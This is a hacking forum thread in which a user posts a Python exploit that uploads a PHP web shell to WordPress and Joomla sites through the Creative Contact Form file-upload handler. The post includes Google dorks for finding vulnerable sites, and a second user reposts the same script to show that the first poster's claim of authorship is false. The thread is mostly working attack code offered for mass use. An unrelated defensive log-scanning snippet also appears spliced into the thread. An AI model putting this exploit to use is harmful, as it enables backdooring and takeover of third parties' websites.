WordPress, Joomla / Mass Shell Upload

Discussion in 'Exploitler' started by Dj_Taleh, December 27, 2016.

  1. Dj_Taleh

    Dj_Taleh Elite member

    Joined: Oct 10, 2016
    Messages: 345
    This is an exploit I wrote myself recently.
    What does it do?
    It automatically uploads a shell to WordPress and Joomla sites.
    The software is written in Python.
    For this, Python must be installed.
    Then you open CMD on the computer and
    run it...
    If you put the sites on the desktop as a list

    PHP:
    #!/usr/bin/python
    #
    # Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
    #               Wordpress plugin version: <= 0.9.7
    #               Joomla extension version: <= 2.0.0
    #
    # Vulnerability discovered by Dj_Taleh
    #
    # Exploit written by Dj_Taleh
    #
    # Dork google wordpress:  inurl:inurl:sexy-contact-form
    # Dork google joomla   :  inurl:com_creativecontactform
    #
    # Tested on BackBox 3.x
    #
    # http connection
    import urllib, urllib2, sys, mimetypes
    # Args management
    import optparse
    # file management
    import os, os.path

    # Check url
    def checkurl(url):
        if url[:8] != "https://" and url[:7] != "http://":
            print('[X] You must insert http:// or https:// protocol')
            sys.exit(1)
        else:
            return url

    # Check if file exists and is readable
    def checkfile(file):
        if not os.path.isfile(file) or not os.access(file, os.R_OK):
            print('[X] '+file+' file is missing or not readable')
            sys.exit(1)
        else:
            return file
    # Get file's mimetype
    def get_content_type(filename):
        return mimetypes.guess_type(filename)[0] or 'application/octet-stream'

    # Create multipart header
    def create_body_sh3ll_upl04d(payloadname):

       getfields = dict()

       payloadcontent = open(payloadname).read()

       LIMIT = '----------lImIt_of_THE_fIle_eW_$'
       CRLF = '\r\n'

       L = []
       for (key, value) in getfields.items():
          L.append('--' + LIMIT)
          L.append('Content-Disposition: form-data; name="%s"' % key)
          L.append('')
          L.append(value)

       L.append('--' + LIMIT)
       L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname))
       L.append('Content-Type: %s' % get_content_type(payloadname))
       L.append('')
       L.append(payloadcontent)
       L.append('--' + LIMIT + '--')
       L.append('')
       body = CRLF.join(L)
       return body

    banner = """


                                                                            
                    `---'                                                                         
                                                                                                  

                                                         Cr3ative C0nt4ct Form Sh3ll Upl04d

                                         Discovered by:
                                        
                                           Dj_Taleh

                                          Written by:

                                           Dj_Taleh

                                     http://www.SpyHackerz.Com

                                        [email protected]
                                    [email protected]

                                
                                        https://SpyHackerz.Com/
                       https://www.youtube.com/channel/UC-3ND6JYf3j1fe8rw2CyMog/videos
    """

    commandList = optparse.OptionParser('usage: %prog -t URL -c CMS -f FILENAME.PHP [--timeout sec]')
    commandList.add_option('-t', '--target', action="store",
                      help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                      )
    commandList.add_option('-c', '--cms', action="store",
                      help="Insert CMS Type: wordpress|joomla",
                      )
    commandList.add_option('-f', '--file', action="store",
                      help="Insert file name, ex: shell.php",
                      )
    commandList.add_option('--timeout', action="store", default=10, type="int",
                      help="[Timeout Value] - Default 10",
                      )

    options, remainder = commandList.parse_args()

    # Check args
    if not options.target or not options.file or not options.cms:
        print(banner)
        commandList.print_help()
        sys.exit(1)

    payloadname = checkfile(options.file)
    host = checkurl(options.target)
    timeout = options.timeout
    cmstype = options.cms

    print(banner)

    if options.cms == "wordpress":
       url_sexy_upload = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php'
       backdoor_location = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/files/'

    elif options.cms == "joomla":
       url_sexy_upload = host+'/components/com_creativecontactform/fileupload/index.php'
       backdoor_location = host+'/components/com_creativecontactform/fileupload/files/'

    else:
       print("[X] -c options require: 'wordpress' or 'joomla'")
       sys.exit(1)

    content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'

    bodyupload = create_body_sh3ll_upl04d(payloadname)

    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
               'content-type': content_type,
               'content-length': str(len(bodyupload)) }

    try:
       req = urllib2.Request(url_sexy_upload, bodyupload, headers)
       response = urllib2.urlopen(req)

       if "error" in response.read():
          print("[X] Upload Failed :(")
       else:
          print("[!] Shell Uploaded")
          print("[!] "+backdoor_location+options.file)
    except urllib2.HTTPError as e:
       print("[X] Http Error: "+str(e.code))
    except urllib2.URLError as e:
       # URLError carries .reason, not .code
       print("[X] Connection Error: "+str(e.reason))
     
    Hector, Dragon Caliph and KuRaLsZ like this.
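A defender-side check for the request pattern the script above produces, as an added example that is not part of the original post: it scans web-server access logs for POSTs to the two upload handlers and for requests to script files under their `files/` directories. Combined Log Format is assumed, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Upload handler per CMS, taken from the paths in the posted script.
UPLOAD_ENDPOINTS = (
    "/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php",
    "/components/com_creativecontactform/fileupload/index.php",
)
# Directory the handler writes into: <handler dir>/files/
UPLOAD_DIRS = tuple(p.rsplit("/", 1)[0] + "/files/" for p in UPLOAD_ENDPOINTS)

# Combined Log Format: ip - user [time] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)

def classify(line):
    """Return (ip, kind, path, status) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _ts, method, target, status = m.groups()
    path = urlsplit(target).path  # drop any query string
    if method == "POST" and path in UPLOAD_ENDPOINTS:
        return (ip, "upload", path, int(status))
    if path.startswith(UPLOAD_DIRS) and SCRIPT_EXT.search(path):
        return (ip, "script-access", path, int(status))
    return None

def triage(lines):
    """Per client: an accepted upload plus a 200 on a script in the upload dir."""
    hits = {}
    for line in lines:
        hit = classify(line)
        if hit:
            hits.setdefault(hit[0], []).append(hit[1:])
    report = {}
    for ip, events in hits.items():
        uploaded = any(k == "upload" and s == 200 for k, _, s in events)
        executed = any(k == "script-access" and s == 200 for k, _, s in events)
        report[ip] = "compromise-likely" if uploaded and executed else "probe"
    return report

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [27/Dec/2016:10:00:01 +0000] "POST /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [27/Dec/2016:10:00:05 +0000] "GET /wp-content/plugins/sexy-contact-form/includes/fileupload/files/x.php HTTP/1.1" 200 20 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [27/Dec/2016:10:02:00 +0000] "POST /components/com_creativecontactform/fileupload/index.php HTTP/1.1" 404 150 "-" "Mozilla/5.0"',
    '192.0.2.4 - - [27/Dec/2016:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
```

A "compromise-likely" verdict means the upload directory should be inspected for script files and the plugin or extension removed or updated past the versions named in the script header.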
  2. Hacker047

    Hacker047 Honorary member

    Joined: Jun 2, 2016
    Messages: 393
    Thanks for the effort, need to try it
     
    Hector and Dj_Taleh like this.
  3. Dj_Taleh

    Dj_Taleh Elite member

    Joined: Oct 10, 2016
    Messages: 345
    yes, try it bro :)
     
    Hector likes this.
  4. Adbes

    Adbes Honorary member

    Joined: January 20, 2016
    Messages: 479
    taleh, they've stolen your exploit :D
    Code:
    #!/usr/bin/python
    #
    # Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
    #               Wordpress plugin version: <= 0.9.7
    #               Joomla extension version: <= 2.0.0
    #
    # Vulnerability discovered by Gianni Angelozzi
    #
    # Exploit written by Claudio Viviani
    #
    # Dork google wordpress:  inurl:inurl:sexy-contact-form
    # Dork google joomla   :  inurl:com_creativecontactform
    #
    # Tested on BackBox 3.x
    #
    # http connection
    import urllib, urllib2, sys, mimetypes
    # Args management
    import optparse
    # file management
    import os, os.path
     
    # Check url
    def checkurl(url):
        if url[:8] != "https://" and url[:7] != "http://":
            print('[X] You must insert http:// or https:// protocol')
            sys.exit(1)
        else:
            return url
     
    # Check if file exists and has readable
    def checkfile(file):
        if not os.path.isfile(file) or not os.access(file, os.R_OK):
            print('[X] '+file+' file is missing or not readable')
            sys.exit(1)
        else:
            return file
    # Get file's mimetype
    def get_content_type(filename):
        return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
     
    # Create multipart header
    def create_body_sh3ll_upl04d(payloadname):
     
       getfields = dict()
     
       payloadcontent = open(payloadname).read()
     
       LIMIT = '----------lImIt_of_THE_fIle_eW_$'
       CRLF = '\r\n'
     
       L = []
       for (key, value) in getfields.items():
          L.append('--' + LIMIT)
          L.append('Content-Disposition: form-data; name="%s"' % key)
          L.append('')
          L.append(value)
     
       L.append('--' + LIMIT)
       L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname))
       L.append('Content-Type: %s' % get_content_type(payloadname))
       L.append('')
       L.append(payloadcontent)
       L.append('--' + LIMIT + '--')
       L.append('')
       body = CRLF.join(L)
       return body
     
    banner = """
     
     
      ___ ___               __                            __,-,__                                
     |   Y   .-----.----.--|  .-----.----.-----.-----.   |  ' '__|                               
     |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|   |     __|                               
     |. / \  |_____|__| |_____|   __|__| |_____|_____|   |_______|                               
     |:      |    _______     |__|             __           |_|                                  
     |::.|:. |   |   _   .-----.-----.--------|  .---.-.                                         
     `--- ---'   |___|   |  _  |  _  |        |  |  _  |                                         
                 |.  |   |_____|_____|__|__|__|__|___._|                                         
                 |:  1   |                                                                       
                 |::.. . |                                                                       
                 `-------'    
      _______                  __   __                 _______             __              __
     |   _   .----.-----.---.-|  |_|__.--.--.-----.   |   _   .-----.-----|  |_.---.-.----|  |_  
     |.  1___|   _|  -__|  _  |   _|  |  |  |  -__|   |.  1___|  _  |     |   _|  _  |  __|   _| 
     |.  |___|__| |_____|___._|____|__|\___/|_____|   |.  |___|_____|__|__|____|___._|____|____| 
     |:  1   |       _______                          |:  1   |                                  
     |::.. . |      |   _   .-----.----.--------.     |::.. . |                                  
     `-------'      |.  1___|  _  |   _|        |     `-------'                                  
                    |.  __) |_____|__| |__|__|__|                                                
                    |:  |                                                                        
                    |::.|                                                                        
                    `---'                                                                        
                                                                                                   
     
                                                         Cr3ative C0nt4ct Form Sh3ll Upl04d
     
                                         Discovered by:
                                         
                                        Gianni Angelozzi
     
                                          Written by:
     
                                        Claudio Viviani
     
                                     http://www.homelab.it
     
                                        [email protected]
                                    [email protected]
     
                                https://www.facebook.com/homelabit
                                  https://twitter.com/homelabit
                                https://plus.google.com/+HomelabIt1/
                       https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
    """
     
    commandList = optparse.OptionParser('usage: %prog -t URL -c CMS -f FILENAME.PHP [--timeout sec]')
    commandList.add_option('-t', '--target', action="store",
                      help="Insert TARGET URL: http://www.victim.com[:PORT]",
                      )
    commandList.add_option('-c', '--cms', action="store",
                      help="Insert CMS Type: wordpress|joomla",
                      )
    commandList.add_option('-f', '--file', action="store",
                      help="Insert file name, ex: shell.php",
                      )
    commandList.add_option('--timeout', action="store", default=10, type="int",
                      help="[Timeout Value] - Default 10",
                      )
     
    options, remainder = commandList.parse_args()
     
    # Check args
    if not options.target or not options.file or not options.cms:
        print(banner)
        commandList.print_help()
        sys.exit(1)
     
    payloadname = checkfile(options.file)
    host = checkurl(options.target)
    timeout = options.timeout
    cmstype = options.cms
     
    print(banner)
     
    if options.cms == "wordpress":
       url_sexy_upload = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php'
       backdoor_location = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/files/'
     
    elif options.cms == "joomla":
       url_sexy_upload = host+'/components/com_creativecontactform/fileupload/index.php'
       backdoor_location = host+'/components/com_creativecontactform/fileupload/files/'
     
    else:
       print("[X] -c options require: 'wordpress' or 'joomla'")
       sys.exit(1)
     
    content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
     
    bodyupload = create_body_sh3ll_upl04d(payloadname)
     
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
               'content-type': content_type,
               'content-length': str(len(bodyupload)) }
     
    try:
       req = urllib2.Request(url_sexy_upload, bodyupload, headers)
       response = urllib2.urlopen(req)
     
       if "error" in response.read():
          print("[X] Upload Failed :(")
       else:
          print("[!] Shell Uploaded")
          print("[!] "+backdoor_location+options.file)
    except urllib2.HTTPError as e:
       print("[X] Http Error: "+str(e.code))
    except urllib2.URLError as e:
       print("[X] Connection Error: "+str(e.reason))
    
    
     
    Hector, KuRaLsZ and Dj_Taleh like this.
  5. Dj_Taleh

    Dj_Taleh Elite member

    Joined: Oct 10, 2016
    Messages: 345

    Yes, they've stolen a lot of things :D
     
    Hector likes this.
  6. BaByiN

    BaByiN Member

    Joined: December 19, 2016
    Messages: 26
    Of the old exploits, Revslider gives the best result
     
    Hector and Dj_Taleh like this.
  7. justwatch

    justwatch Member

    Joined: December 26, 2016
    Messages: 8
    It would have been better as a video, thanks for your work
     
    Hector likes this.
  8. hacker-top

    hacker-top Member

    Joined: January 13, 2017
    Messages: 5
    nice <new member
     
    Hector likes this.
  9. Dragon Caliph

    Dragon Caliph Member

    Joined: Oct 9, 2016
    Messages: 187
    Nice share, just my kind of thing. :) Does this upload a shell in every case (even without write permission)?
     
    Hector likes this.
  10. Hector

    Hector Member

    Joined: January 15, 2017
    Messages: 90
    Thanks for your work, nice exp
     
  11. RichmanTR

    RichmanTR Member

    Joined: January 16, 2017
    Messages: 20
    Thanks Taleh
     